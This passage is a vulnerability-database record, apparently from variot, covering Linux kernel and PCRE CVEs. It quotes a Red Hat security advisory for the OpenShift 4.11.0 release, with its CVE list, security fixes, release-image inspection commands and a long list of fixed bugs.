"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1996"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-41974"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:8609"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-41974"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-3515"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-3515"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-38177"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-38178"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-38178"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33034"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-26147"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3483"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3564"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3679"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-42008"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-28972"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-34693"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-38204"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-409116"
},
{
"db": "VULMON",
"id": "CVE-2021-45485"
},
{
"db": "PACKETSTORM",
"id": "167602"
},
{
"db": "PACKETSTORM",
"id": "167622"
},
{
"db": "PACKETSTORM",
"id": "167072"
},
{
"db": "PACKETSTORM",
"id": "167330"
},
{
"db": "PACKETSTORM",
"id": "169695"
},
{
"db": "PACKETSTORM",
"id": "169997"
},
{
"db": "PACKETSTORM",
"id": "166101"
},
{
"db": "CNNVD",
"id": "CNNVD-202112-2265"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-017434"
},
{
"db": "NVD",
"id": "CVE-2021-45485"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "VULHUB",
"id": "VHN-409116",
"ident": null
},
{
"db": "VULMON",
"id": "CVE-2021-45485",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "167602",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "167622",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "167072",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "167330",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "169695",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "169997",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "166101",
"ident": null
},
{
"db": "CNNVD",
"id": "CNNVD-202112-2265",
"ident": null
},
{
"db": "JVNDB",
"id": "JVNDB-2021-017434",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2021-45485",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2021-12-25T00:00:00",
"db": "VULHUB",
"id": "VHN-409116",
"ident": null
},
{
"date": "2021-12-25T00:00:00",
"db": "VULMON",
"id": "CVE-2021-45485",
"ident": null
},
{
"date": "2022-06-28T15:20:26",
"db": "PACKETSTORM",
"id": "167602",
"ident": null
},
{
"date": "2022-06-29T20:27:02",
"db": "PACKETSTORM",
"id": "167622",
"ident": null
},
{
"date": "2022-05-11T16:37:26",
"db": "PACKETSTORM",
"id": "167072",
"ident": null
},
{
"date": "2022-05-31T17:24:53",
"db": "PACKETSTORM",
"id": "167330",
"ident": null
},
{
"date": "2022-11-02T15:01:20",
"db": "PACKETSTORM",
"id": "169695",
"ident": null
},
{
"date": "2022-11-23T15:18:44",
"db": "PACKETSTORM",
"id": "169997",
"ident": null
},
{
"date": "2022-02-22T17:06:12",
"db": "PACKETSTORM",
"id": "166101",
"ident": null
},
{
"date": "2021-12-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202112-2265",
"ident": null
},
{
"date": "2023-01-18T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2021-017434",
"ident": null
},
{
"date": "2021-12-25T02:15:06.667000",
"db": "NVD",
"id": "CVE-2021-45485",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2023-02-24T00:00:00",
"db": "VULHUB",
"id": "VHN-409116",
"ident": null
},
{
"date": "2023-02-24T00:00:00",
"db": "VULMON",
"id": "CVE-2021-45485",
"ident": null
},
{
"date": "2023-01-04T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202112-2265",
"ident": null
},
{
"date": "2023-01-18T05:28:00",
"db": "JVNDB",
"id": "JVNDB-2021-017434",
"ident": null
},
{
"date": "2024-11-21T06:32:18.733000",
"db": "NVD",
"id": "CVE-2021-45485",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202112-2265"
}
],
"trust": 0.6
},
"title": {
"_id": null,
"data": "Linux\u00a0Kernel\u00a0 Vulnerability in using cryptographic algorithms in",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-017434"
}
],
"trust": 0.8
},
"type": {
"_id": null,
"data": "encryption problem",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202112-2265"
}
],
"trust": 0.6
}
}
VAR-202006-0222
Vulnerability from variot - Updated: 2026-03-09 21:42libpcre in PCRE before 8.44 allows an integer overflow via a large number after a (?C substring. PCRE is an open source regular expression library written in C language by Philip Hazel software developer. An input validation error vulnerability exists in libpcre in versions prior to PCRE 8.44. An attacker could exploit this vulnerability to execute arbitrary code or cause an application to crash on the system with a large number of requests. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
====================================================================
Red Hat Security Advisory
Synopsis: Important: OpenShift Container Platform 4.11.0 bug fix and security update Advisory ID: RHSA-2022:5069-01 Product: Red Hat OpenShift Enterprise Advisory URL: https://access.redhat.com/errata/RHSA-2022:5069 Issue date: 2022-08-10 CVE Names: CVE-2018-25009 CVE-2018-25010 CVE-2018-25012 CVE-2018-25013 CVE-2018-25014 CVE-2018-25032 CVE-2019-5827 CVE-2019-13750 CVE-2019-13751 CVE-2019-17594 CVE-2019-17595 CVE-2019-18218 CVE-2019-19603 CVE-2019-20838 CVE-2020-13435 CVE-2020-14155 CVE-2020-17541 CVE-2020-19131 CVE-2020-24370 CVE-2020-28493 CVE-2020-35492 CVE-2020-36330 CVE-2020-36331 CVE-2020-36332 CVE-2021-3481 CVE-2021-3580 CVE-2021-3634 CVE-2021-3672 CVE-2021-3695 CVE-2021-3696 CVE-2021-3697 CVE-2021-3737 CVE-2021-4115 CVE-2021-4156 CVE-2021-4189 CVE-2021-20095 CVE-2021-20231 CVE-2021-20232 CVE-2021-23177 CVE-2021-23566 CVE-2021-23648 CVE-2021-25219 CVE-2021-31535 CVE-2021-31566 CVE-2021-36084 CVE-2021-36085 CVE-2021-36086 CVE-2021-36087 CVE-2021-38185 CVE-2021-38593 CVE-2021-40528 CVE-2021-41190 CVE-2021-41617 CVE-2021-42771 CVE-2021-43527 CVE-2021-43818 CVE-2021-44225 CVE-2021-44906 CVE-2022-0235 CVE-2022-0778 CVE-2022-1012 CVE-2022-1215 CVE-2022-1271 CVE-2022-1292 CVE-2022-1586 CVE-2022-1621 CVE-2022-1629 CVE-2022-1706 CVE-2022-1729 CVE-2022-2068 CVE-2022-2097 CVE-2022-21698 CVE-2022-22576 CVE-2022-23772 CVE-2022-23773 CVE-2022-23806 CVE-2022-24407 CVE-2022-24675 CVE-2022-24903 CVE-2022-24921 CVE-2022-25313 CVE-2022-25314 CVE-2022-26691 CVE-2022-26945 CVE-2022-27191 CVE-2022-27774 CVE-2022-27776 CVE-2022-27782 CVE-2022-28327 CVE-2022-28733 CVE-2022-28734 CVE-2022-28735 CVE-2022-28736 CVE-2022-28737 CVE-2022-29162 CVE-2022-29810 CVE-2022-29824 CVE-2022-30321 CVE-2022-30322 CVE-2022-30323 CVE-2022-32250 ==================================================================== 1. Summary:
Red Hat OpenShift Container Platform release 4.11.0 is now available with updates to packages and images that fix several bugs and add enhancements.
This release includes a security update for Red Hat OpenShift Container Platform 4.11.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Description:
Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.
This advisory contains the container images for Red Hat OpenShift Container Platform 4.11.0. See the following advisory for the RPM packages for this release:
https://access.redhat.com/errata/RHSA-2022:5068
Space precludes documenting all of the container images in this advisory. See the following Release Notes documentation, which will be updated shortly for this release, for details about these changes:
https://docs.openshift.com/container-platform/4.11/release_notes/ocp-4-11-release-notes.html
Security Fix(es):
- go-getter: command injection vulnerability (CVE-2022-26945)
- go-getter: unsafe download (issue 1 of 3) (CVE-2022-30321)
- go-getter: unsafe download (issue 2 of 3) (CVE-2022-30322)
- go-getter: unsafe download (issue 3 of 3) (CVE-2022-30323)
- nanoid: Information disclosure via valueOf() function (CVE-2021-23566)
- sanitize-url: XSS (CVE-2021-23648)
- minimist: prototype pollution (CVE-2021-44906)
- node-fetch: exposure of sensitive information to an unauthorized actor (CVE-2022-0235)
- prometheus/client_golang: Denial of service using InstrumentHandlerCounter (CVE-2022-21698)
- golang: crash in a golang.org/x/crypto/ssh server (CVE-2022-27191)
- go-getter: writes SSH credentials into logfile, exposing sensitive credentials to local uses (CVE-2022-29810)
- opencontainers: OCI manifest and index parsing confusion (CVE-2021-41190)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
You may download the oc tool and use it to inspect release image metadata as follows:
(For x86_64 architecture)
$ oc adm release info quay.io/openshift-release-dev/ocp-release:4.11.0-x86_64
The image digest is sha256:300bce8246cf880e792e106607925de0a404484637627edf5f517375517d54a4
(For aarch64 architecture)
$ oc adm release info quay.io/openshift-release-dev/ocp-release:4.11.0-aarch64
The image digest is sha256:29fa8419da2afdb64b5475d2b43dad8cc9205e566db3968c5738e7a91cf96dfe
(For s390x architecture)
$ oc adm release info quay.io/openshift-release-dev/ocp-release:4.11.0-s390x
The image digest is sha256:015d6180238b4024d11dfef6751143619a0458eccfb589f2058ceb1a6359dd46
(For ppc64le architecture)
$ oc adm release info quay.io/openshift-release-dev/ocp-release:4.11.0-ppc64le
The image digest is sha256:5052f8d5597c6656ca9b6bfd3de521504c79917aa80feb915d3c8546241f86ca
All OpenShift Container Platform 4.11 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift Console or the CLI oc command. Instructions for upgrading a cluster are available at https://docs.openshift.com/container-platform/4.11/updating/updating-cluster-cli.html
- Solution:
For OpenShift Container Platform 4.11 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this asynchronous errata update:
https://docs.openshift.com/container-platform/4.11/release_notes/ocp-4-11-release-notes.html
Details on how to access this content are available at https://docs.openshift.com/container-platform/4.11/updating/updating-cluster-cli.html
- Bugs fixed (https://bugzilla.redhat.com/):
1817075 - MCC & MCO don't free leader leases during shut down -> 10 minutes of leader election timeouts
1822752 - cluster-version operator stops applying manifests when blocked by a precondition check
1823143 - oc adm release extract --command, --tools doesn't pull from localregistry when given a localregistry/image
1858418 - [OCPonRHV] OpenShift installer fails when Blank template is missing in oVirt/RHV
1859153 - [AWS] An IAM error occurred occasionally during the installation phase: Invalid IAM Instance Profile name
1896181 - [ovirt] install fails: due to terraform error "Cannot run VM. VM is being updated" on vm resource
1898265 - [OCP 4.5][AWS] Installation failed: error updating LB Target Group
1902307 - [vSphere] cloud labels management via cloud provider makes nodes not ready
1905850 - oc adm policy who-can failed to check the operatorcondition/status resource
1916279 - [OCPonRHV] Sometimes terraform installation fails on -failed to fetch Cluster(another terraform bug)
1917898 - [ovirt] install fails: due to terraform error "Tag not matched: expect but got " on vm resource
1918005 - [vsphere] If there are multiple port groups with the same name installation fails
1918417 - IPv6 errors after exiting crictl
1918690 - Should update the KCM resource-graph timely with the latest configure
1919980 - oVirt installer fails due to terraform error "Failed to wait for Templte(...) to become ok"
1921182 - InspectFailed: kubelet Failed to inspect image: rpc error: code = DeadlineExceeded desc = context deadline exceeded
1923536 - Image pullthrough does not pass 429 errors back to capable clients
1926975 - [aws-c2s] kube-apiserver crashloops due to missing cloud config
1928932 - deploy/route_crd.yaml in openshift/router uses deprecated v1beta1 CRD API
1932812 - Installer uses the terraform-provider in the Installer's directory if it exists
1934304 - MemoryPressure Top Pod Consumers seems to be 2x expected value
1943937 - CatalogSource incorrect parsing validation
1944264 - [ovn] CNO should gracefully terminate OVN databases
1944851 - List of ingress routes not cleaned up when routers no longer exist - take 2
1945329 - In k8s 1.21 bump conntrack 'should drop INVALID conntrack entries' tests are disabled
1948556 - Cannot read property 'apiGroup' of undefined error viewing operator CSV
1949827 - Kubelet bound to incorrect IPs, referring to incorrect NICs in 4.5.x
1957012 - Deleting the KubeDescheduler CR does not remove the corresponding deployment or configmap
1957668 - oc login does not show link to console
1958198 - authentication operator takes too long to pick up a configuration change
1958512 - No 1.25 shown in REMOVEDINRELEASE for apis audited with k8s.io/removed-release 1.25 and k8s.io/deprecated true
1961233 - Add CI test coverage for DNS availability during upgrades
1961844 - baremetal ClusterOperator installed by CVO does not have relatedObjects
1965468 - [OSP] Delete volume snapshots based on cluster ID in their metadata
1965934 - can not get new result with "Refresh off" if click "Run queries" again
1965969 - [aws] the public hosted zone id is not correct in the destroy log, while destroying a cluster which is using BYO private hosted zone.
1968253 - GCP CSI driver can provision volume with access mode ROX
1969794 - [OSP] Document how to use image registry PVC backend with custom availability zones
1975543 - [OLM] Remove stale cruft installed by CVO in earlier releases
1976111 - [tracker] multipathd.socket is missing start conditions
1976782 - Openshift registry starts to segfault after S3 storage configuration
1977100 - Pod failed to start with message "set CPU load balancing: readdirent /proc/sys/kernel/sched_domain/cpu66/domain0: no such file or directory"
1978303 - KAS pod logs show: [SHOULD NOT HAPPEN] ...failed to convert new object...CertificateSigningRequest) to smd typed: .status.conditions: duplicate entries for key [type=\"Approved\"]
1978798 - [Network Operator] Upgrade: The configuration to enable network policy ACL logging is missing on the cluster upgraded from 4.7->4.8
1979671 - Warning annotation for pods with cpu requests or limits on single-node OpenShift cluster without workload partitioning
1982737 - OLM does not warn on invalid CSV
1983056 - IP conflict while recreating Pod with fixed name
1984785 - LSO CSV does not contain disconnected annotation
1989610 - Unsupported data types should not be rendered on operand details page
1990125 - co/image-registry is degrade because ImagePrunerDegraded: Job has reached the specified backoff limit
1990384 - 502 error on "Observe -> Alerting" UI after disabled local alertmanager
1992553 - all the alert rules' annotations "summary" and "description" should comply with the OpenShift alerting guidelines
1994117 - Some hardcodes are detected at the code level in orphaned code
1994820 - machine controller doesn't send vCPU quota failed messages to cluster install logs
1995953 - Ingresscontroller change the replicas to scaleup first time will be rolling update for all the ingress pods
1996544 - AWS region ap-northeast-3 is missing in installer prompt
1996638 - Helm operator manager container restart when CR is creating&deleting
1997120 - test_recreate_pod_in_namespace fails - Timed out waiting for namespace
1997142 - OperatorHub: Filtering the OperatorHub catalog is extremely slow
1997704 - [osp][octavia lb] given loadBalancerIP is ignored when creating a LoadBalancer type svc
1999325 - FailedMount MountVolume.SetUp failed for volume "kube-api-access" : object "openshift-kube-scheduler"/"kube-root-ca.crt" not registered
1999529 - Must gather fails to gather logs for all the namespace if server doesn't have volumesnapshotclasses resource
1999891 - must-gather collects backup data even when Pods fails to be created
2000653 - Add hypershift namespace to exclude namespaces list in descheduler configmap
2002009 - IPI Baremetal, qemu-convert takes to long to save image into drive on slow/large disks
2002602 - Storageclass creation page goes blank when "Enable encryption" is clicked if there is a syntax error in the configmap
2002868 - Node exporter not able to scrape OVS metrics
2005321 - Web Terminal is not opened on Stage of DevSandbox when terminal instance is not created yet
2005694 - Removing proxy object takes up to 10 minutes for the changes to propagate to the MCO
2006067 - Objects are not valid as a React child
2006201 - ovirt-csi-driver-node pods are crashing intermittently
2007246 - Openshift Container Platform - Ingress Controller does not set allowPrivilegeEscalation in the router deployment
2007340 - Accessibility issues on topology - list view
2007611 - TLS issues with the internal registry and AWS S3 bucket
2007647 - oc adm release info --changes-from does not show changes in repos that squash-merge
2008486 - Double scroll bar shows up on dragging the task quick search to the bottom
2009345 - Overview page does not load from openshift console for some set of users after upgrading to 4.7.19
2009352 - Add image-registry usage metrics to telemeter
2009845 - Respect overrides changes during installation
2010361 - OpenShift Alerting Rules Style-Guide Compliance
2010364 - OpenShift Alerting Rules Style-Guide Compliance
2010393 - [sig-arch][Late] clients should not use APIs that are removed in upcoming releases [Suite:openshift/conformance/parallel]
2011525 - Rate-limit incoming BFD to prevent ovn-controller DoS
2011895 - Details about cloud errors are missing from PV/PVC errors
2012111 - LSO still try to find localvolumeset which is already deleted
2012969 - need to figure out why osupdatedstart to reboot is zero seconds
2013144 - Developer catalog category links could not be open in a new tab (sharing and open a deep link works fine)
2013461 - Import deployment from Git with s2i expose always port 8080 (Service and Pod template, not Route) if another Route port is selected by the user
2013734 - unable to label downloads route in openshift-console namespace
2013822 - ensure that the container-tools content comes from the RHAOS plashets
2014161 - PipelineRun logs are delayed and stuck on a high log volume
2014240 - Image registry uses ICSPs only when source exactly matches image
2014420 - Topology page is crashed
2014640 - Cannot change storage class of boot disk when cloning from template
2015023 - Operator objects are re-created even after deleting it
2015042 - Adding a template from the catalog creates a secret that is not owned by the TemplateInstance
2015356 - Different status shows on VM list page and details page
2015375 - PVC creation for ODF/IBM Flashsystem shows incorrect types
2015459 - [azure][openstack]When image registry configure an invalid proxy, registry pods are CrashLoopBackOff
2015800 - [IBM]Shouldn't change status.storage.bucket and status.storage.resourceKeyCRN when update sepc.stroage,ibmcos with invalid value
2016425 - Adoption controller generating invalid metadata.Labels for an already adopted Subscription resource
2016534 - externalIP does not work when egressIP is also present
2017001 - Topology context menu for Serverless components always open downwards
2018188 - VRRP ID conflict between keepalived-ipfailover and cluster VIPs
2018517 - [sig-arch] events should not repeat pathologically expand_less failures - s390x CI
2019532 - Logger object in LSO does not log source location accurately
2019564 - User settings resources (ConfigMap, Role, RB) should be deleted when a user is deleted
2020483 - Parameter $auto_interval_period is in Period drop-down list
2020622 - e2e-aws-upi and e2e-azure-upi jobs are not working
2021041 - [vsphere] Not found TagCategory when destroying ipi cluster
2021446 - openshift-ingress-canary is not reporting DEGRADED state, even though the canary route is not available and accessible
2022253 - Web terminal view is broken
2022507 - Pods stuck in OutOfpods state after running cluster-density
2022611 - Remove BlockPools(no use case) and Object(redundat with Overview) tab on the storagesystem page for NooBaa only and remove BlockPools tab for External mode deployment
2022745 - Cluster reader is not able to list NodeNetwork objects
2023295 - Must-gather tool gathering data from custom namespaces.
2023691 - ClusterIP internalTrafficPolicy does not work for ovn-kubernetes
2024427 - oc completion zsh doesn't auto complete
2024708 - The form for creating operational CRs is badly rendering filed names ("obsoleteCPUs" -> "Obsolete CP Us" )
2024821 - [Azure-File-CSI] need more clear info when requesting pvc with volumeMode Block
2024938 - CVE-2021-41190 opencontainers: OCI manifest and index parsing confusion
2025624 - Ingress router metrics endpoint serving old certificates after certificate rotation
2026356 - [IPI on Azure] The bootstrap machine type should be same as master
2026461 - Completed pods in Openshift cluster not releasing IP addresses and results in err: range is full unless manually deleted
2027603 - [UI] Dropdown doesn't close on it's own after arbiter zone selection on 'Capacity and nodes' page
2027613 - Users can't silence alerts from the dev console
2028493 - OVN-migration failed - ovnkube-node: error waiting for node readiness: timed out waiting for the condition
2028532 - noobaa-pg-db-0 pod stuck in Init:0/2
2028821 - Misspelled label in ODF management UI - MCG performance view
2029438 - Bootstrap node cannot resolve api-int because NetworkManager replaces resolv.conf
2029470 - Recover from suddenly appearing old operand revision WAS: kube-scheduler-operator test failure: Node's not achieving new revision
2029797 - Uncaught exception: ResizeObserver loop limit exceeded
2029835 - CSI migration for vSphere: Inline-volume tests failing
2030034 - prometheusrules.openshift.io: dial tcp: lookup prometheus-operator.openshift-monitoring.svc on 172.30.0.10:53: no such host
2030530 - VM created via customize wizard has single quotation marks surrounding its password
2030733 - wrong IP selected to connect to the nodes when ExternalCloudProvider enabled
2030776 - e2e-operator always uses quay master images during presubmit tests
2032559 - CNO allows migration to dual-stack in unsupported configurations
2032717 - Unable to download ignition after coreos-installer install --copy-network
2032924 - PVs are not being cleaned up after PVC deletion
2033482 - [vsphere] two variables in tf are undeclared and get warning message during installation
2033575 - monitoring targets are down after the cluster run for more than 1 day
2033711 - IBM VPC operator needs e2e csi tests for ibmcloud
2033862 - MachineSet is not scaling up due to an OpenStack error trying to create multiple ports with the same MAC address
2034147 - OpenShift VMware IPI Installation fails with Resource customization when corespersocket is unset and vCPU count is not a multiple of 4
2034296 - Kubelet and Crio fails to start during upgrde to 4.7.37
2034411 - [Egress Router] No NAT rules for ipv6 source and destination created in ip6tables-save
2034688 - Allow Prometheus/Thanos to return 401 or 403 when the request isn't authenticated
2034958 - [sig-network] Conntrack should be able to preserve UDP traffic when initial unready endpoints get ready
2035005 - MCD is not always removing in progress taint after a successful update
2035334 - [RFE] [OCPonRHV] Provision machines with preallocated disks
2035899 - Operator-sdk run bundle doesn't support arm64 env
2036202 - Bump podman to >= 3.3.0 so that setup of multiple credentials for a single registry which can be distinguished by their path will work
2036594 - [MAPO] Machine goes to failed state due to a momentary error of the cluster etcd
2036948 - SR-IOV Network Device Plugin should handle offloaded VF instead of supporting only PF
2037190 - dns operator status flaps between True/False/False and True/True/(False|True) after updating dnses.operator.openshift.io/default
2037447 - Ingress Operator is not closing TCP connections.
2037513 - I/O metrics from the Kubernetes/Compute Resources/Cluster Dashboard show as no datapoints found
2037542 - Pipeline Builder footer is not sticky and yaml tab doesn't use full height
2037610 - typo for the Terminated message from thanos-querier pod description info
2037620 - Upgrade playbook should quit directly when trying to upgrade RHEL-7 workers to 4.10
2037625 - AppliedClusterResourceQuotas can not be shown on project overview
2037626 - unable to fetch ignition file when scaleup rhel worker nodes on cluster enabled Tang disk encryption
2037628 - Add test id to kms flows for automation
2037721 - PodDisruptionBudgetAtLimit alert fired in SNO cluster
2037762 - Wrong ServiceMonitor definition is causing failure during Prometheus configuration reload and preventing changes from being applied
2037841 - [RFE] use /dev/ptp_hyperv on Azure/AzureStack
2038115 - Namespace and application bar is not sticky anymore
2038244 - Import from git ignore the given servername and could not validate On-Premises GitHub and BitBucket installations
2038405 - openshift-e2e-aws-workers-rhel-workflow in CI step registry broken
2038774 - IBM-Cloud OVN IPsec fails, IKE UDP ports and ESP protocol not in security group
2039135 - the error message is not clear when using "opm index prune" to prune a file-based index image
2039161 - Note about token for encrypted PVCs should be removed when only cluster wide encryption checkbox is selected
2039253 - ovnkube-node crashes on duplicate endpoints
2039256 - Domain validation fails when TLD contains a digit.
2039277 - Topology list view items are not highlighted on keyboard navigation
2039462 - Application tab in User Preferences dropdown menus are too wide.
2039477 - validation icon is missing from Import from git
2039589 - The toolbox command always ignores [command] the first time
2039647 - Some developer perspective links are not deep-linked causes developer to sometimes delete/modify resources in the wrong project
2040180 - Bug when adding a new table panel to a dashboard for OCP UI with only one value column
2040195 - Ignition fails to enable systemd units with backslash-escaped characters in their names
2040277 - ThanosRuleNoEvaluationFor10Intervals alert description is wrong
2040488 - OpenShift-Ansible BYOH Unit Tests are Broken
2040635 - CPU Utilisation is negative number for "Kubernetes / Compute Resources / Cluster" dashboard
2040654 - 'oc adm must-gather -- some_script' should exit with same non-zero code as the failed 'some_script' exits
2040779 - Nodeport svc not accessible when the backend pod is on a window node
2040933 - OCP 4.10 nightly build will fail to install if multiple NICs are defined on KVM nodes
2041133 - 'oc explain route.status.ingress.conditions' shows type 'Currently only Ready' but actually is 'Admitted'
2041454 - Garbage values accepted for --reference-policy in oc import-image without any error
2041616 - Ingress operator tries to manage DNS of additional ingresscontrollers that are not under clusters basedomain, which can't work
2041769 - Pipeline Metrics page not showing data for normal user
2041774 - Failing git detection should not recommend Devfiles as import strategy
2041814 - The KubeletConfigController wrongly process multiple confs for a pool
2041940 - Namespace pre-population not happening till a Pod is created
2042027 - Incorrect feedback for "oc label pods --all"
2042348 - Volume ID is missing in output message when expanding volume which is not mounted.
2042446 - CSIWithOldVSphereHWVersion alert recurring despite upgrade to vmx-15
2042501 - use lease for leader election
2042587 - ocm-operator: Improve reconciliation of CA ConfigMaps
2042652 - Unable to deploy hw-event-proxy operator
2042838 - The status of container is not consistent on Container details and pod details page
2042852 - Topology toolbars are unaligned to other toolbars
2042999 - A pod cannot reach kubernetes.default.svc.cluster.local cluster IP
2043035 - Wrong error code provided when request contains invalid argument
2043068 - available of text disappears in Utilization item if x is 0
2043080 - openshift-installer intermittent failure on AWS with Error: InvalidVpcID.NotFound: The vpc ID 'vpc-123456789' does not exist
2043094 - ovnkube-node not deleting stale conntrack entries when endpoints go away
2043118 - Host should transition through Preparing when HostFirmwareSettings changed
2043132 - Add a metric when vsphere csi storageclass creation fails
2043314 - oc debug node does not meet compliance requirement
2043336 - Creating multi SriovNetworkNodePolicy cause the worker always be draining
2043428 - Address Alibaba CSI driver operator review comments
2043533 - Update ironic, inspector, and ironic-python-agent to latest bugfix release
2043672 - [MAPO] root volumes not working
2044140 - When 'oc adm upgrade --to-image ...' rejects an update as not recommended, it should mention --allow-explicit-upgrade
2044207 - [KMS] The data in the text box does not get cleared on switching the authentication method
2044227 - Test Managed cluster should only include cluster daemonsets that have maxUnavailable update of 10 or 33 percent fails
2044412 - Topology list misses separator lines and hover effect let the list jump 1px
2044421 - Topology list does not allow selecting an application group anymore
2044591 - CVE-2022-0235 node-fetch: exposure of sensitive information to an unauthorized actor
2044803 - Unify button text style on VM tabs
2044824 - Failing test in periodics: [sig-network] Services should respect internalTrafficPolicy=Local Pod and Node, to Pod (hostNetwork: true) [Feature:ServiceInternalTrafficPolicy] [Skipped:Network/OVNKubernetes] [Suite:openshift/conformance/parallel] [Suite:k8s]
2045065 - Scheduled pod has nodeName changed
2045073 - Bump golang and build images for local-storage-operator
2045087 - Failed to apply sriov policy on intel nics
2045551 - Remove enabled FeatureGates from TechPreviewNoUpgrade
2045559 - API_VIP moved when kube-api container on another master node was stopped
2045577 - [ocp 4.9 | ovn-kubernetes] ovsdb_idl|WARN|transaction error: {"details":"cannot delete Datapath_Binding row 29e48972-xxxx because of 2 remaining reference(s)","error":"referential integrity violation
2045872 - SNO: cluster-policy-controller failed to start due to missing serving-cert/tls.crt
2045880 - CVE-2022-21698 prometheus/client_golang: Denial of service using InstrumentHandlerCounter
2046133 - [MAPO]IPI proxy installation failed
2046156 - Network policy: preview of affected pods for non-admin shows empty popup
2046157 - Still uses pod-security.admission.config.k8s.io/v1alpha1 in admission plugin config
2046191 - Opeartor pod is missing correct qosClass and priorityClass
2046277 - openshift-installer intermittent failure on AWS with "Error: Provider produced inconsistent result after apply" when creating the module.vpc.aws_subnet.private_subnet[0] resource
2046319 - oc debug cronjob command failed with error "unable to extract pod template from type v1.CronJob".
2046435 - Better Devfile Import Strategy support in the 'Import from Git' flow
2046496 - Awkward wrapping of project toolbar on mobile
2046497 - Re-enable TestMetricsEndpoint test case in console operator e2e tests
2046498 - "All Projects" and "all applications" use different casing on topology page
2046591 - Auto-update boot source is not available while create new template from it
2046594 - "Requested template could not be found" while creating VM from user-created template
2046598 - Auto-update boot source size unit is byte on customize wizard
2046601 - Cannot create VM from template
2046618 - Start last run action should contain current user name in the started-by annotation of the PLR
2046662 - Should upgrade the go version to be 1.17 for example go operator memcached-operator
2047197 - Sould upgrade the operator_sdk.util version to "0.4.0" for the "osdk_metric" module
2047257 - [CP MIGRATION] Node drain failure during control plane node migration
2047277 - Storage status is missing from status card of virtualization overview
2047308 - Remove metrics and events for master port offsets
2047310 - Running VMs per template card needs empty state when no VMs exist
2047320 - New route annotation to show another URL or hide topology URL decorator doesn't work for Knative Services
2047335 - 'oc get project' caused 'Observed a panic: cannot deep copy core.NamespacePhase' when AllRequestBodies is used
2047362 - Removing prometheus UI access breaks origin test
2047445 - ovs-configure mis-detecting the ipv6 status on IPv4 only cluster causing Deployment failure
2047670 - Installer should pre-check that the hosted zone is not associated with the VPC and throw the error message.
2047702 - Issue described on bug #2013528 reproduced: mapi_current_pending_csr is always set to 1 on OpenShift Container Platform 4.8
2047710 - [OVN] ovn-dbchecker CrashLoopBackOff and sbdb jsonrpc unix socket receive error
2047732 - [IBM]Volume is not deleted after destroy cluster
2047741 - openshift-installer intermittent failure on AWS with "Error: Provider produced inconsistent result after apply" when creating the module.masters.aws_network_interface.master[1] resource
2047790 - [sig-network][Feature:Router] The HAProxy router should override the route host for overridden domains with a custom value [Skipped:Disconnected] [Suite:openshift/conformance/parallel]
2047799 - release-openshift-ocp-installer-e2e-aws-upi-4.9
2047870 - Prevent redundant queries of BIOS settings in HostFirmwareController
2047895 - Fix architecture naming in oc adm release mirror for aarch64
2047911 - e2e: Mock CSI tests fail on IBM ROKS clusters
2047913 - [sig-network][Feature:Router] The HAProxy router should override the route host for overridden domains with a custom value [Skipped:Disconnected] [Suite:openshift/conformance/parallel]
2047925 - [FJ OCP4.10 Bug]: IRONIC_KERNEL_PARAMS does not contain coreos_kernel_params during iPXE boot
2047935 - [4.11] Bootimage bump tracker
2047998 - [alicloud] CCM deploys alibaba-cloud-controller-manager from quay.io/openshift/origin-
2048059 - Service Level Agreement (SLA) always show 'Unknown'
